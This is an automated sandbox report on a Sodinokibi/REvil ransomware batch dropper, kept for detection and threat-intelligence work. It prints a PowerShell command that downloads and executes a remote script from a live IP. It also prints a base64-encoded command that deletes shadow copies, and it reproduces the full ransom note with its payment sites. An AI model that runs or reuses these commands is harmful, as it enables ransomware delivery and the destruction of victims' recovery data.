Analysis

  • max time kernel
    136s
  • max time network
    56s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    03-06-2020 23:10

General

  • Target

    837314d5a05e52f9e0f09a5a473497d3.bat

  • Size

    219B

  • MD5

    e87a8c6ada089d0fc3473fb4ba1558c2

  • SHA1

    dd36ca2fa4407f895a6261a1cfee402482ed0bc9

  • SHA256

    26044d6010566eb7dd69bf7aa8595f0aa4b739d18418526591bd1bf544f91b4a

  • SHA512

    254f838fba727d5a1fc5a71a60182b9b940e0fcb93a0797e335ee99e46d4a8ea2d7a613f7ee72a567146a7d13ff2bc20f8187eb199bd336969eedfed6403ed4c

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/837314d5a05e52f9e0f09a5a473497d3

Extracted

Path

C:\88a3w9hls4-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 88a3w9hls4. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/99CC83E05C635FBD 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/99CC83E05C635FBD Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: UVebTkdtjjkDgSDgySj1U/DhdAAq+UdEpopVzgmjgGWtX4cc8rQux/ODDBNynpN5 8M3lWAlcVGfGh8tjrqgag/dtYC+j5zhS66LxPhEkzWJHIVPatFWqEue2qhbBrWtY Zyk7xpyggMDjEkJKcrTyJM0P5MSDuNp0AJPXkaBJD6HqM7KhJdZANCQbcTUavG9k HYv2eDbrM6jyfJiajFxQNyZ/mCivZIuNhEoibDvcy2HpebtuYCqZFe79aDn7Nzqp SYQDSIOqZBvjOuRYystqedoJYLk1b++vS9WrAoKfKMsEog1BcfHQxoaBDubVNsFU qyoAJ2rarwch/U6EJL3YQPlOP3uEzKtLMnyxj8g4bZ+edFT2CkWathoRgwV18Ojg DfBYPcwoL2IdRN5yT/yvwuruOgwYHzBb8w1Jr6a7NA7M9YIbUJIolypt3C7YWT7T 1/tDw19/ibI59GEzByqID1khlf62k+kg0uyfbGS5QBeyR13MrvwMMZZnk/wOqaS1 KFsHMDrgNmFeFjDCuY2nb6bpu9vzhsotPvuNdiGvBUoxp1gveWVXfNBhhPMb115S kiVyzJh31dJLyvmNnAiT8+kfhGvrVqJ45ceFhLHPmI7vcu04DwXCpqwMhoCyv1BQ TDihNnjnkGvmJnbUHYNBUAugY/0Hm1xrv+VNNP8m0PwCFWhoLrqvRfggyMAvkwMq WL9w5JuMwBvjsHwnubUidjJreyKopuDrA8EGn1w8tyttDli5vYRyECmGIdwKRk66 nZaG6MkrYV1b0oTcqgEG9AnFmGJbBOoQiRopYlqpUvHjiGA+40Kr+SdQTfOFrg/z IKtmc2drIRaYazDdWx5ScHNk39Tf8xnrDqD6GeK1syy/D/5QK1letcD1yQH962mY xkav29ziPF8c/CG/q4RENUgnKbWbaz+hrgReIsoXgbhfsHpp6V4hQrJW4zo4j5Es Aruow3SPNXrjy0sVQUVOtDJb0ZyiuYA6oFklj+c16Y1LvrF28+tfiJS8hZrWFYpp typCZAzuVDm8+rou8GfS0wwxrzmPvkdp5RhoOyyEz84V63K8RCnZCqmttVcE4Y64 WlGTPlM6ByqCDBpEkEbphNAvJbDF7ienNhdBeSpgE5ejdjOOl+ktmdfY8ijmADmN 5OAdtcxBkLsWbCi5kNbgY3s2dzQEX7hHOaUGZlnswdq0WPuoiqqD5sSbeJeH+yMN 8ei/ly0H/2rDH+hkEmy+1WeRCD321EW6P7Sxaxu21Swevi01HtUIkFaummBROS3t klRfrPeQ96RZ4tXL8TMF4/T6pyyrRzbuHeZN0+Jdj+tL5SBRTNIjXQ== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/99CC83E05C635FBD

http://decryptor.cc/99CC83E05C635FBD

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Enumerates connected drives 3 TTPs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 34 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\837314d5a05e52f9e0f09a5a473497d3.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1032
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/837314d5a05e52f9e0f09a5a473497d3');Invoke-VPQRVSXXHIUV;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Sets desktop wallpaper using registry
      • Suspicious use of WriteProcessMemory
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      PID:364
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1900
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1616

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

  • memory/364-12-0x0000000009280000-0x0000000009605000-memory.dmp

    Filesize

    3.5MB